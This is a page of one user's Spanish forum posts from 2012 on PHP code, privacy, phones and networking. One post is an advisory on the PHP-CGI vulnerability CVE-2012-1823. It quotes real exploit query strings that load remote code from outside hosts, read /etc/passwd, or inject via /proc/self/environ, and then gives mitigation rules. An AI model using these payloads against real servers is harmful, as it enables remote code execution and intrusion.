elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Temas
Páginas: 1 ... 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 [20] 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36
191  Programación / PHP / Firma dinámica (Detección ip real y Sistema operativo) PHP en: 16 Mayo 2012, 11:40 am
Código
  1. <?php
  2. #
  3. # file: JZOsig.php
  4. # author: AnimAlf
  5. #
  6. # This lines are under the GNU General Public License.
  7. # http://www.gnu.org/copyleft/gpl.html
  8. #
  9. # cph.keldenauto.com
  10. #
  11.  
  12. header( "Content-type: image/PNG" );
  13.  
  14. function RealIPget() {  
  15.  if ( $_SERVER[ 'HTTP_X_FORWARDED_FOR' ] != '' ) {
  16.    $client_ip =
  17.      ( !empty( $_SERVER['REMOTE_ADDR' ]) ) ?
  18.        $_SERVER[ 'REMOTE_ADDR' ]
  19.          :
  20.        ( ( !empty($_ENV[ 'REMOTE_ADDR' ]) ) ?
  21.        $_ENV[ 'REMOTE_ADDR' ]
  22.           :
  23.        "unknown" );  
  24.      // los proxys van añadiendo al final de esta cabecera
  25.      // las direcciones ip que van "ocultando". Para localizar la ip real
  26.      // del usuario se comienza a mirar por el principio hasta encontrar
  27.      // una dirección ip que no sea del rango privado. En caso de no
  28.      // encontrarse ninguna se toma como valor el REMOTE_ADDR
  29.      $entries = split( '[, ]' , $_SERVER [ 'HTTP_X_FORWARDED_FOR' ] );
  30.  
  31.      reset( $entries );
  32.      while ( list( , $entry ) = each( $entries ) )
  33.      {
  34.         $entry = trim( $entry );
  35.         if ( preg_match( "/^([0-9]+.[0-9]+.[0-9]+.[0-9]+)/", $entry, $ip_list ) )
  36.         {
  37.            // http://www.faqs.org/rfcs/rfc1918.html
  38.            $private_ip = array(
  39.                  '/^0./',
  40.                  '/^127.0.0.1/',
  41.                  '/^192.168..*/',
  42.                  '/^172.((1[6-9])|(2[0-9])|(3[0-1]))..*/',
  43.                  '/^10..*/');
  44.  
  45.            $found_ip = preg_replace ( $private_ip, $client_ip, $ip_list [ 1 ] );
  46.  
  47.            if ( $client_ip != $found_ip )
  48.            {
  49.               $client_ip = $found_ip;
  50.               break;
  51.            }
  52.         }
  53.      }
  54.   }
  55.   else
  56.   {
  57.      $client_ip =
  58.         ( !empty ( $_SERVER [ 'REMOTE_ADDR' ] ) ) ?
  59.            $_SERVER [ 'REMOTE_ADDR' ]
  60.            :
  61.            ( ( !empty ( $_ENV [ 'REMOTE_ADDR' ] ) ) ?
  62.               $_ENV [ 'REMOTE_ADDR' ]
  63.               :
  64.               "unknown" );
  65.   }
  66.   return $client_ip;  
  67. }
  68.  
  69. function DetectOs () {
  70.  if(eregi( "linux",$_SERVER [ 'HTTP_USER_AGENT' ])){
  71.    $rtnStr = "[GNU/Linux] Saludos a oOOoo TuXeR oOOoo";
  72.  } elseif ( eregi ( "win32", $_SERVER [ 'HTTP_USER_AGENT' ] ) ||
  73.      eregi ( "Win 9x 4.90", $_SERVER [ 'HTTP_USER_AGENT' ] ) ||
  74.      eregi ( "windows 2000",$_SERVER ['HTTP_USER_AGENT' ] ) ||
  75.      eregi ( "(windows nt)( ){0,1}(5.0)", $_SERVER [ 'HTTP_USER_AGENT' ] ) ||
  76.      eregi ( "(windows nt)( ){0,1}(5.1)", $_SERVER [ 'HTTP_USER_AGENT' ] ) ||
  77.      eregi ( "(win)([0-9]{2})", $_SERVER [ 'HTTP_USER_AGENT' ], $regs ) ||
  78.      eregi ( "(windows) ([0-9]{2})", $_SERVER [ 'HTTP_USER_AGENT' ], $regs ) ||
  79.      eregi ( "(winnt)([0-9]{1,2}.[0-9]{1,2}){0,1}", $_SERVER [ 'HTTP_USER_AGENT' ], $regs ) ||
  80.      eregi ( "(windows nt)( ){0,1}([0-9]{1,2}.[0-9]{1,2}){0,1}", $_SERVER [ 'HTTP_USER_AGENT' ], $regs ) ) {
  81.        $rtnStr = "Un Microsoftista por estos lares :))";
  82.  } elseif ( eregi ( "mac", $_SERVER [ 'HTTP_USER_AGENT' ] ) ) {
  83.    $rtnStr = "(¯`·._.·-oOOoo-<[ Macintosh ]>-oOOoo-·._.·´¯)";
  84.  } else {
  85.    if ( eregi ( "(sunos) ([0-9]{1,2}.[0-9]{1,2}){0,1}",$_SERVER ['HTTP_USER_AGENT'],$regs ) ) {
  86.      $rtnStr = "SunOS $regs[2]";
  87.    } elseif ( eregi ( "(beos) r([0-9]{1,2}.[0-9]{1,2}){0,1}", $_SERVER [ 'HTTP_USER_AGENT' ], $regs ) ) {
  88.      $rtnStr = "BeOS $regs[2]";
  89.    } elseif ( eregi ( "freebsd", $_SERVER [ 'HTTP_USER_AGENT' ] ) ) {
  90.      $rtnStr = "FreeBSD";
  91.    } elseif ( eregi ( "openbsd", $_SERVER [ 'HTTP_USER_AGENT' ] ) ) {
  92.      $rtnStr = "OpenBSD";
  93.    } elseif ( eregi ( "irix", $_SERVER [ 'HTTP_USER_AGENT' ] ) ) {
  94.      $rtnStr = "IRIX";
  95.    } elseif ( eregi ( "os/2", $_SERVER [ 'HTTP_USER_AGENT' ] ) ) {
  96.      $rtnStr = "OS/2";
  97.    } elseif ( eregi ( "plan9", $_SERVER [ 'HTTP_USER_AGENT' ] ) ) {
  98.      $rtnStr = "Plan9";
  99.    } elseif ( eregi ( "unix", $_SERVER [ 'HTTP_USER_AGENT' ] ) ||
  100.      eregi ( "hp-ux", $_SERVER [ 'HTTP_USER_AGENT' ] ) ||
  101.        eregi ( "X11", $_SERVER [ 'HTTP_USER_AGENT' ] ) ) {
  102.        $rtnStr = "Unix";
  103.    } elseif(eregi ( "osf", $_SERVER [ 'HTTP_USER_AGENT' ] ) ) {
  104.      $rtnStr = "OSF";
  105.    } else{$rtnStr = "TuMáquinA";
  106.    $rtnStr = "CyberSurfeando con $rtnStr";
  107.    }
  108.  }
  109.  return $rtnStr;
  110. }
  111.  
  112. $tmpInt = 1;
  113. $linea [ $tmpInt ] = gethostbyaddr ( RealIPget () );
  114. $tmpInt++;
  115. $linea [ $tmpInt ] = DetectOs ();
  116.  
  117. $ancho = 0; $alto = 0;
  118. for ( $a=1; $a<=$tmpInt; $a++ ) {
  119.  $tmpBox= imagettfbbox ( 13,0, "./files/trebucit.ttf", $linea [ $a ] );
  120.  if ( $tmpBox [ 2 ] - $tmpBox [ 0 ] > $ancho )
  121.    $ancho = $tmpBox [ 2 ] - $tmpBox [ 0 ];
  122.  if ( $tmpBox [ 3 ] - $tmpBox [ 5 ] > $alto )
  123.    $alto =  $tmpBox [ 3 ] - $tmpBox[ 5 ];
  124. }
  125.  
  126. $altoTotal =  $alto * $tmpInt;
  127.  
  128. $im = imagecreatefrompng ( "./img/fondo_banner.png" );
  129. list ( $fondo_w, $fondo_h ) = getimagesize ( "./img/fondo_banner.png" );
  130.  
  131. $im_tmp = imagecreatefrompng( "img/M3I4L.png" );
  132. list ( $tux_w, $tux_h ) = getimagesize ( "./img/M3I4L.png" );
  133. imagecopy ( $im, $im_tmp, $fondo_w - $tux_w - 25, $fondo_h - $tux_h + 30, 0, 0, $tux_w, $tux_h );
  134.  
  135. $im_tmp = imagecreatefrompng ( "./img/mosx_banner.png" );
  136. list ( $mac_w, $mac_h ) = getimagesize ( "./img/mosx_banner.png" );
  137. imagecopy ( $im, $im_tmp, $fondo_w/2 - $mac_w + 16 , $fondo_h - $mac_h, 0, 0, $mac_w, $mac_h );
  138.  
  139. $im_tmp = imagecreatefrompng( "img/mosx_tux.png" );
  140. list ( $tux_w, $tux_h ) = getimagesize ( "./img/mosx_tux.png" );
  141. imagecopy ( $im, $im_tmp, $fondo_w - $tux_w, $fondo_h - $tux_h, 0, 0, $tux_w, $tux_h );
  142.  
  143. $im_tmp = imagecreatefrompng( "./img/GNU-Linux.png" );
  144. list ( $tux_w, $tux_h ) = getimagesize ( "./img/GNU-Linux.png" );
  145. imagecopy ( $im, $im_tmp, 0, $fondo_h - $tux_h, 0, 0, $tux_w, $tux_h );
  146.  
  147. $semitrans = imagecolorallocatealpha($im,  0x99, 0x99, 0x99, 0x25);
  148. imagefilledrectangle ( $im, 2, 2, $ancho + 4, $alto * $tmpInt + 6, $semitrans );
  149.  
  150. $b=0;
  151.  
  152. for ( $a=1; $a<=$tmpInt; $a++ ) {
  153.  $b=!$b;
  154.  if ($b) {
  155.    $fontColor = imagecolorallocate( $im, 0, 255, 255 );
  156.    imagettftext ( $im, 13, 0, 4, $alto*$a, $fontColor, "./files/trebucit.ttf", $linea [ $a ] );
  157.  } else {
  158.    $fontColor = imagecolorallocate( $im, 255, 255, 204 );
  159.    imagettftext ( $im, 12, 0, 4, $alto*$a, $fontColor, "./files/trebucit.ttf", $linea [ $a ] );
  160.  }
  161. }
  162.  
  163. $fontColor = imagecolorallocate( $im, 0, 156, 255 );
  164. imagettftext ( $im, 13, 12, 63, $alto*$a + 24, $fontColor, "./files/trebucit.ttf", RealIPget () );
  165.  
  166. //Mostramos el grafico en pantalla
  167. imagepng ( $im );
  168.  
  169. //Liberamos memoria
  170. imagedestroy ( $im );
  171. ?>
192  Programación / PHP / Grave vulnerabilidad PHP en modo CGI en: 15 Mayo 2012, 18:03 pm
Una vulnerabilidad vigente desde hace 8 años y la desucbren por casualidad  >:D

Apache mod_cgi

¿Cómo comprobar si su sitio es vulnerable?

Añadiendo -s? Al final de la URL  de cualquierscript PHP, como:
Código:
ww.tusitioweb.com/index.php?-s

Código:
?-s

http://example.com/index.php?-dauto_prepend_file%3d/etc/passwd+-n

Si ve el código PHP, el PHP es vulnerable.
Si ves a tu página normalmente, su sitio no se ve afectada.

Código:
    Allow_url_include: Permite el uso de fopen con algunas funciones como include, include_once,require, require_once.

    Auto_prepend_file: Permite especificar un archivo que será interpretado antes del fichero principal.

Ejemplos ataque (la mayoría intentando usar una webshell o ejecutando un backdoor)

/index.php?-s'
/index.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.5999mu.com/a.txt'
/index.php?-s/wp-admin/install.php'
/wordpress/index.php?-s'
/wp/index.php?-s'
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron'
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2Fphp-cgi.ipq.co%2Fi'
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dphp:%2f%2finput'
/index.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.qz0451.com/1.txt'

¿Cómo mitigar el problema?
Si su sitio se ve afectada, y puede que tenga disponible y habilitado mod_rewrite en Apache, por favor, añadir a la htaccess la regla de reescritura.:

El siguiente código no funciona:

Código:
RewriteEngine on

RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? - [F,L]

Si funciona:

Código:
    RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
    RewriteRule ^(.*) $1? [L]

Regla con mod_security

Código:
SecRule QUERY_STRING "^-[sdcr]" "phase:1,t:none,t:urlDecodeUni,t:removeWhitespace,block,log,msg:'Potential PHP-CGI Exploit Attempt'"

Solución:

Actualizar a PHP 5.4.3 and PHP 5.3.13
http://www.php.net/archive/2012.php#id2012-05-08-1

Fuentes:
http://ompldr.org/vZGxxaQ
http://www.php.net/archive/2012.php#id2012-05-03-1
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

En Español:
http://www.elladodelmal.com/2012/05/ejecutar-codigo-remoto-en-apache-con.html
http://www.pentester.es/2012/05/explotando-php-cgi.html

193  Programación / PHP / Validación e-mail formulario en: 8 Mayo 2012, 19:38 pm
Validar e-mail:

Código
  1. function verify_email($email){
  2.  
  3.    if(!preg_match('/^[_A-z0-9-]+((\.|\+)[_A-z0-9-]+)*@[A-z0-9-]+(\.[A-z0-9-]+)*(\.[A-z]{2,4})$/',$email)){
  4.        return false;
  5.    } else {
  6.        return $email;
  7.    }
  8. }

Código
  1.    function EmailValidation($email)
  2.    {
  3.    $email = htmlspecialchars(stripslashes(strip_tags($email))); //parse unnecessary characters to prevent exploits
  4.    if ( eregi ( '[a-z||0-9]@[a-z||0-9].[a-z]', $email ) )
  5.    { //checks to make sure the email address is in a valid format
  6.    $domain = explode( "@", $email ); //get the domain name
  7.    if ( @fsockopen ($domain[1],80,$errno,$errstr,3))
  8.    {
  9.    //if the connection can be established, the email address is probably valid
  10.    return true;
  11.    } else
  12.    {
  13.    return false; //if a connection cannot be established return false
  14.    }
  15.    return false; //if email address is an invalid format return false
  16.    }
  17.    }



Código
  1. function validar_email($email) {
  2.  
  3. list($local, $domain) = explode("@", $email);
  4.  
  5. $pattern_local = '^([0-9a-z]*([-|_]?[0-9a-z]+)*)(([-|_]?)\.([-|_]?)[0-9a-z]*([-|_]?[0-9a-z]+)+)*([-|_]?)$';
  6. $pattern_domain = '^([0-9a-z]+([-]?[0-9a-z]+)*)(([-]?)\.([-]?)[0-9a-z]*([-]?[0-9a-z]+)+)*\.[a-z]{2,4}$';
  7.  
  8. $match_local = eregi($pattern_local, $local);
  9. $match_domain = eregi($pattern_domain, $domain);
  10.  
  11. if ($match_local && $match_domain) {
  12. return 1;
  13. } else {
  14. return 0;
  15. }
  16. }

En PHP 5:

Se añade la funcionalidad de filter_var

Código
  1. if(filter_var("prueba@dominio.com", FILTER_VALIDATE_EMAIL)){
  2. echo "Ok";
  3. } else {
  4. echo "Error";
  5. }

Usando filter _var y comprobando que tenga un punto el dominio con una expresión regular:

Código
  1. function validateEmailAddress($email) {
  2.    return filter_var($email, FILTER_VALIDATE_EMAIL) && preg_match('/@.+\./', $email);
  3. }

Ejemplo Wordpress (usando expresiones regulares)

Código
  1.    function is_email($email) {
  2.     if( strlen( $email ) < 3 ){
  3.      return false;
  4.     }
  5.     if( strpos( $email, '@', 1 ) === false ){
  6.      return false;
  7.     }
  8.     list( $local, $domain ) = explode( '@', $Valor, 2 );
  9.     if( !preg_match( '/^[a-zA-Z0-9!#$%&\'*+\/=?^_`{|}~\.-]+$/', $local ) ){
  10.      return false;
  11.     }
  12.     if( preg_match( '/\.{2,}/', $domain ) ){
  13.      return false;
  14.     }
  15.      if( trim( $domain, " \t\n\r\0\x0B." ) !== $domain ){
  16.      return false;
  17.     }
  18.      $subs = explode( '.', $domain );
  19.      if( 2 > count( $subs ) ){
  20.      return false;
  21.     }
  22.     foreach ( $subs as $sub ) {
  23.      if( trim( $sub, " \t\n\r\0\x0B-" ) !== $sub ){
  24.       return false;
  25.      }
  26.      if( !preg_match('/^[a-z0-9-]+$/i', $sub ) ){
  27.       return false;
  28.      }
  29.     }
  30.     return true;
  31.    }


Verificar e-mail mirando registro MX si es válido,  útil para separar nombre y dominio de un e-mail


Código
  1. function verify_email_dns($email){
  2.  
  3.    // This will split the email into its front
  4.    // and back (the domain) portions
  5.    list($name, $domain) = explode('@',$email);
  6.  
  7.    if(!checkdnsrr($domain,'MX')){
  8.  
  9.        // No MX record found
  10.        return false;
  11.  
  12.    } else {
  13.  
  14.        // MX record found, return email
  15.        return $email;
  16.  
  17.    }
  18. }


Código
  1. $string = 'some_name@somedomain.com';
  2. $res = explode('@', $string);
  3. // array
  4. echo $res[0];
  5. $name = $res[0];
  6. echo $name;


substr

Código
  1. $mail = "some_name@somedomain.com";
  2. echo substr($mail, 0, strpos($mail, '@') );
  3.  

explode

Código
  1. list($name, $domain) = explode('@', $mail);
  2. echo $name;
194  Foros Generales / Sugerencias y dudas sobre el Foro / Mejoras en el geolocalizador en: 8 Mayo 2012, 19:17 pm
http://www.elhacker.net/geolocalizacion.html

Los cambios son:

- Mostrar últimas 5 consultas diferentes (sin repetidos)
- Resolver el reverso de ip (inversa dns, reverso dns, no sé como llamarlo)
- Si es un dominio muestra su ip
- Si es una ip muestra su reverso
- Al seleccionar la ip o el dominio de la caja de texto se selecciona todo para facilitar la escritura
- Si escribes una url (formato http:// también la localiza (limpia la url)
- Si es un email mira la localización del dominio (no de la persona :P) y si no hay registro MX del dominio te informa del error
- Arreglado el Whois IP RFC-954
- Si es una ip privada (rango, clase privado) te avisa

Recordad que el geolocalizador también localiza dominios y muestra todos los subdominios o dominios alojados en una ip (útil para hostings compartidos), además de mostrar el ASN (Proveedor asocionado de una ip, sea ISP o el hosting).

Me  he dado cuenta también (al guardar los logs de lo que consulta la gente) que muchos escriben usuario@gmail.com, imagino que para intentar localizar una persona por su e-mail, pero lógicamente eso no funciona xD

Si alguien se le ocurre alguna idea o sugerencia para añadir, bienvenida sea. Lo típico que has visto en otra web y que te parece práctico que lo tuviera pues lo añadimos, que para eso está.
195  Comunicaciones / Android / Samsung Galaxy S III en: 7 Mayo 2012, 19:32 pm


4,8" Super AMOLED HD, Exynos 4 Quad y reconocimiento de gestos

Su salida en Europa está programada para el 29 de mayo, no hay información sobre operadoras relacionadas, y sabemos que habrá versiones con 16, 32 y 64 GB de almacenamiento, ampliables vía microSD, y con 50GB en la nube gracias a Dropbox.

El Samsung Galaxy S III de 16 GB saldrá por 599 euros en Alemania. . El rival surcoreano del HTC One X ya se puede encargar libre en Alemania por 16 GB de memoria interna, si bien en las ofertas listadas de Chip.de algunas tiendas también lo tienen por 588 y 616 euros (cuestión de escoger). Este importe coincide con la filtración de la filial germana de Amazon, que lo coló en reserva por 599 euros, pero también con una cámara de fotos de 12 megapíxeles y una pantalla de 4,7 pulgadas que finalmente no han aparecido en el modelo definitivo. La operadora T-Mobile tiene confirmada su distribución en Alemania.

Por otro lado, pero sin salirnos de los precios, la británica Carphone Warehouse ya tiene abiertas también las reservas del modelo libre de 16 GB a un precio de 499 libras (613 euros al cambio). Vodafone, Orange, O2, T-Mobile y Three ofrecerán el Galaxy S III como parte de su oferta, habiéndose hecho la primera de ellas con la exclusiva de la versión de 32 GB.



Con un peso de 133 gramos y un grosor de 8,6 mm en su extremo menos esbelto, el nuevo Galaxy S III destaca por ser el primer producto en utilizar el nuevo procesador Samsung Exynos 4 Quad, con que el que el fabricante surcoreano pretende aunar unas prestaciones muy elevadas con un consumo más optimizado. Integra una nueva GPU supuestamente un 65% superior a la unidad Mali 400 del Galaxy S II, así como 1 GB de RAM (aquí es donde posiblemente escucharemos las primeras quejas) y 16, 32 ó 64 GB de almacenamiento (con expansión microSD disponible). La pantalla escogida por Samsung es de tipo Super AMOLED HD (PenTile), posee una resolución de 1280x720 píxeles y ha sido protegida por los chicos de Corning usando una lámina de Gorilla Glass 2.









Hardware: especificaciones y diseño

    Carcasa de policarbonato con acabado brillante. El móvil, al contrario que su antecesor, tiene unas formas redondeadas y la parte posterior es curva. Aun así, según nuestros colegas de Celularis (que se trasladaron a Londres para la presentación) y pese al plástico, es bastante sólido.

    Colores: De momento, confirmado azul marino, negro y blanco.

    Con un peso de 133 gramos, el grosor aumenta hasta alcanzar los 8,6 milímetros. 136mm de largo por 70.6mm de ancho.

    Cuenta con tres botones y un LED para las notificaciones, al igual que los smartphones de Blackberry. La batería es extraible y llega a los 2.100 mAh.

    La pantalla, HD SuperAMOLED, aumenta hasta las 4,8 pulgadas frente a las 4,3 de su antecesor. La resolución se queda en los 1280x720 píxeles. Para llegar a este tamaño se ha reducido los márgenes del móvil aprovechando al máximo el espacio disponible.

    Procesador Exynos de cuatro núcleos (a 1,4GHZ por núcleo) y 1Gb RAM de memoria.

    Hay diferentes modelos, pero la capacidad interna es de 16, 32 y 64Gb. Además, incluye una ranura microSD para aumentarla hasta 64GB más.

    Cámara de 8 megapíxeles y video en fullHD (1080p). La cámara delantera llega a los 2 megapíxel y graba video en 720p.

    Incluye bluetooth 4.0 y NFC.

    Entre los accesorios encontramos un cargador inalámbrico, para recargar el móvil sin cables, mediante electricidad inductiva y una funda similar a la Smart Cover para el iPad: Flip Cover.

Software: Android a medida

Parece que Samsung se va alejando cada vez más de la imagen de Google y Android. Con una nueva versión del SO Android Ice Cream Sandwich, el nuevo Galaxy SIII llevará instalado de serie una versión conocida como TouchWiz Nature UX. A continuación algunas de sus mayores características:

    Music Hub: más de 17 millones de canciones en la nube, 2 millones más que el propio Spotify. Samsung quiere ser la competencia directa de los servicios de música más populares que hay en la red y para ello ha lanzado Scan and Match, capaz de escanear todas nuestras canciones y subirlas a sus servidores por 10$ al mes. Sospechosamente similar a iTunes Mach.

    PopupPlay: aprovechando la gran resolución en la pantalla del Galaxy S3, los desarrolladores han implementado la posibilidad de dejar en un segundo plano el video que estemos viendo y realizar otras actividades como enviar emails o escribir algún tweet. Muy interesante y útil por si queremos enviar algún mensaje urgente y no perder de vista nuestros vídeos o películas favoritas.

    Modo Ráfaga: como hemos mencionado en el apartado de hardware, el nuevo Samsung Galaxy S3 incluye una cámara de 8 megapíxeles que además dispara en ráfagas de 3,3 imágenes por segundo. El software nos creará una pequeña visualización de las imágenes realizadas para elegir la que mejor nos haya salido.

    All Share: más similitudes con iOS. En este caso, han copiado la funcionalidad AirPlay descaradamente. Sin necesidades de cables podemos realizar un streaming a televisiones Samsung que estén conectadas a la misma red WiFi.

    Direct Call: utilizando el sensor frontal del terminal, si estamos viendo el contacto de una persona o hablando con ella por WhatsApp, al llevarnos el teléfono al oído realizará una llamada automáticamente a esa persona.

    Buddy Photo Share: parecido al reconocimiento facial en iPhoto, esta funcionalidad reconoce las caras de las personas que aparecen en la foto y si las tenemos guardadas en la agenda podremos enviarles la foto por email con tan solo pulsar un botón.

    S Bean: gracias al NFC, podremos enviar archivos de música, vídeos y fotos entre teléfonos sin necesidad de cables o conexión a internet.

    S Voice: si antes hablábamos de similitudes y casualidades, esto es una burda copia de Siri para iPhone. Casi con el mismo diseño que su homólogo en iOS, S Voice es capaz de funcionar sin necesidad de tocar el terminal, cosa que en iPhone no es posible. Además, hay sorpresa: reconoce el castellano.
196  Foros Generales / Foro Libre / Los diarios Marca y Sport cierran los comentarios en la noticia de Abidal en: 15 Marzo 2012, 19:21 pm
Es una pena, pero sigue quedando mucho estúpido y maleducado en internet...que se aprovechan del cierto anónimato de la red.

Los diarios Marca y Sport anuncia en sus respectivos Twitters, que han tenido que cerrar (ya no moderar) los comentarios de la noticia por la cantidad de insultos y aberraciones que habrán escirto quatro descerebrados a raíz de la noticia del transplante de hígado del jugador francés del F.C.Barcelona, Eirc Abidal.

https://twitter.com/#!/marca/status/180308825960747008

https://twitter.com/#!/Diario_SPORT/status/180344509459214337

Es una pena, no ya que tengan que censurar los contenidos, sino que tengan que eliminar y prohibir directamentelos comentarios en una noticia así. Suerte que, quiero pensar, el 99% había comentado con normalidad la noticia.
197  Seguridad Informática / Seguridad / 7 huellas que dejas en el PC sin saberlo en: 15 Marzo 2012, 16:42 pm
La privacidad es un asunto que nunca se toma lo bastante en serio. Hoy en día, con las herramientas adecuadas, cualquiera puede entrar en tu ordenador, saber qué has estado haciendo en las últimas horas y usar esa información en tu contra.

Pasar un limpiador para borrar la caché de los navegadores es útil, pero hay sitios adonde ni siquiera los limpiadores llegan. Son huellas escondidas y a veces protegidas por el sistema operativo. Te las presentamos y te explicamos cómo borrarlas.

Caché de DNS

Cada vez que cargas una página web en tu navegador, Windows pasa la orden a un servidor DNS para que traduzca el nombre del dominio a una dirección IP. Para ahorrar tiempo, el sistema guarda muchas de estas equivalencias en una caché aparte. Ni que decir tiene, esta información puede sacarse con facilidad.



DNSDataView permite ver todas las peticions DNS guardadas por Windows

Abre la opción --> File --> Load Windows DNS caché

Si alguien abre la caché de DNS, por ejemplo con DNSDataView, sabrá qué páginas visitas con mayor frecuencia. Para borrarla, puedes usar esa misma utilidad o bien teclear ipconfig /flushdns en la línea de comandos. CCleaner también permite hacerlo desde la sección Sistema, pero la casilla está desactivada por defecto.


Identificadores de memorias y discos USB conectados

Quizá no sepas que cada vez que conectas un disco a un ordenador con Windows, su identificador queda almacenado en el Registro de Windows. Se puede sacar información tan valiosa como el número de serie, la marca, el modelo y cuando se escribió en el aparato por última vez.



USBOblivion borra las huellas de todas las memorias extraíbles que conectaste en el pasado

Para borrar estas huellas puedes usar USBOblivion, una utilidad portable que escanea el Registro en busca de identificadores de dispositivos de almacenamiento extraíble y los elimina.


Caché de Flash y Java


La caché de los navegadores web se limita a las páginas web y a las imágenes. Muchas aplicaciones web programadas con Flash y Java no se ven afectadas por la limpieza de caché clásica, puesto que almacenan archivos en las caché de los plugins.

CCleaner puede borrar tanto la caché de Flash como la de Java, pero si prefieres tener más control sobre lo que borras hay que recurrir a los paneles de cada complemento. Para Flash, entra en Panel de control de Flash y echa un vistazo al contenido.



Cookies, imágenes, sonidos, partidas de juegos web... la caché de Flash es una mina

Por lo que se refiere a Java, sigue estos sencillos pasos del manual de Oracle. Si quieres evitar que Java almacene contenido temporal en el ordenador, desmarca la primera casilla de la Configuración de archivos temporales.

Borrar la caché de Java es bastante sencillo: solo tienes que hacer clic en Borrar archivos...

Archivo de paginación (Pagefile.sys)

El archivo de paginación, conocido también como espacio de intercambio o swap, se utiliza como memoria virtual en PC que no tienen suficiente RAM para algunas tareas. En el swap acaban muchos datos confidenciales.

En este artículo de Microsoft se explica cómo solicitar a Windows que limpie el archivo Pagefile.sys cada vez que se apague el equipo. Debes abrir el Editor de Registro (regedit.exe) y cambiar el valor ClearPageFileAtShutdown de esta clave:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management

El tipo debe ser REG_DWORD y el valor igual a 1. Ten en cuenta que activando esta limpieza el apagado tomará más tiempo, pero te asegurarás de que no queden contraseñas u otros datos en la memoria de intercambio.

Cambia el valor de ClearPageFileAtShutdown a 1 para activar el borrado del swap al apagar

Archivos borrados

Como explicamos en nuestro especial sobre borrado seguro, cuando borras un archivo desde la Papelera no lo estás eliminando para siempre; el PC evita emprender una tarea tan costosa como sobrescribir el disco varias veces.

El prodigioso Hardwipe borra archivos e incluso discos enteros de forma segura

Para eliminar archivos con total garantía de irreversibilidad, usa Hardwipe. Está traducido al español y es muy fácil de usar. Un correcto uso de herramientas de este tipo impide que Recuva y similares sean eficaces.

Fechas de los archivos

Cuando creas o modificas un archivo, el sistema toma nota del momento en que llevaste a cabo esas operaciones. Así, las fechas de creación, modificación y último acceso pueden decir mucho sobre la vida del documento. Cambiar estas fechas de manera efectiva es tan sencillo como usar Timestomp o File Touch.

Con File Touch puedes cambiar la fecha y hora de muchos archivos a la vez



Metadatos


Los metadatos son el carnet de identidad de un archivo. Pueden contener datos sobre el autor, el momento en que se creó el documento o el lugar en que tuvo lugar la edición. Útiles para algunos, peligrosos para otros, conviene saber cómo se borran.

Metadatos EXIF de una foto en formato JPG. Aparecen la cámara y la fecha original

En el especial sobre metadatos presentamos las mejores herramientas para eliminar y editar metadatos, como MetaStripper y Doc Scrubber. La mejor medida, con todo, consiste en configurar los programas de antemano para que no graben metadatos.

Fuente:
http://onsoftware.softonic.com/7-huellas-que-dejas-en-el-pc-sin-saberlo

Vía: meneame.net
198  Comunicaciones / Redes / Unir conexiones ADSL-Wifi para sumar el ancho de banda en: 1 Marzo 2012, 17:44 pm
Introducción

Conceptos previos, conceptos erróneos y funcionamiento del protocolo de Internet

Cuando alguien entra a su casa , generalmente entra por la puerta , o si es medio paranoico, tal vez por la ventana. Pero nunca por  las dos a la vez, ya que un cuerpo partido a la mitad no puede sobrevivir

En el modelo TCP/IP pasa exactamente lo mismo. Un paquete sale (petición) y entra (respuesta) "obligadamente" siempre por la misma gateway y mismo DNS.

Si un paquete saliera por una puerta de enlace "1",  deberia volver por la misma, porque sino se perdería. (time to live, traceo , etc)

Resumiendo, se puede sumar y aumentar la velocidad global de descargas, pero no la de un archivo en particular.

Teóricamente no es posible descargar 1 solo archivo con dos conexiones diferentes. La razón de esto, es que cuando uno empieza a descargar un archivo de un servidor, el servidor estable una espiece de "tunel" entre tu direccion IP y el para asi poder comunicarse. Dado que las dos conexiones de internet tienen diferentes direcciones IP, el servidor sólo establecera conexión con alguna de las dos. En teorçoa es posible hacerle creer al servidor que las dos conexiones estan bajo 1 sola IP, pero eso causaria un caos al tratar de recibir los paquetes de datos, porque no existe ningún protocolo que regule este tipo de transferencia de datos.

Pero si podemos hacer que este archivo se descargue por segmentos y posteariormente unimos los trozos, con lo que al final el resultado que obtendremos será la suma de bambas conexiones.

Por lo tanto no resulta tan sencillo "sumar" dos conexiones a internet, porque el protocolo tcp/ip tiene ciertas limitaciones. Pero si podremos hacerlo por hardware rápidamente tal y como veremos más adelante.

Lo que normalmente se hace es repartir (que no es lo mismo que sumar a la vez dos conexiones) 2+2 = 4, pero a veces es mejor que unos usen 2 y los otros 2 y no que todos usen 4 a la vez.

Podemos repartir el ancho de banda de varias maneras (QoS) (Calidad del servicio)

- Podemos usar una conexión para navegar y otra para bajar ficheros (por el tipo de tráfico, http, ftp, smtp, pop3, skype, youtube, escritorio remoto), por rangos de ip (por departamentos de trabajo, etc) que unas salga por una conexión y otras por otra)

- Podemos configurar cuánto saldrá por cada WAN y cuantó entrará (kbps) así si   abres en tu PC youtube saldra por WAN1 y si entras a otras webs por WAN2, igual puedes deperminar dominios que salgan por determinada WAN

